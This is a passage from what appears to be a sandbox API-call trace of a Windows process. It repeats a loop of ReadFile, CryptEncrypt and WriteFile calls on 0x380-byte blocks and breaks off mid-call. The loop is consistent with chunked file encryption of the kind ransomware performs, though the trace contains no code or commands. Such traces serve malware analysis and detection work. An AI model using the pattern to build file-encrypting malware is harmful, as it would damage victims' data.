[0273.260] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.260] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.260] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.260] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.260] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.261] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.261] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.261] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.261] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.261] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.261] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.261] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.261] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.261] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.261] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.261] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.261] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.261] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.261] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.261] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.261] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.262] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.262] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.262] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.262] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.262] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.262] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.262] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.262] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.262] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.262] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.262] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.262] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.262] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.262] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.263] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.263] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.263] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.263] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.263] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.263] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.263] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.263] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.263] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.263] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.263] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.263] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.264] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.264] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.264] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.264] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.264] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.264] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.264] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.264] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.264] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.264] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.264] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.264] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.264] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.265] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.265] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.265] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.265] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.265] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.265] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.265] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.265] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.265] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.265] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.265] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.265] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.265] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.265] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.266] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.266] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.266] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.266] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.266] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.266] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.266] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.266] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.266] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.266] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.266] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.266] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.266] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.266] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.267] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.267] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.267] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.267] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.267] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.267] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.267] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.267] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.267] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.267] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.267] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.267] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.267] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.268] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.268] CryptEncrypt (in: hKey=0x2fb108, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, 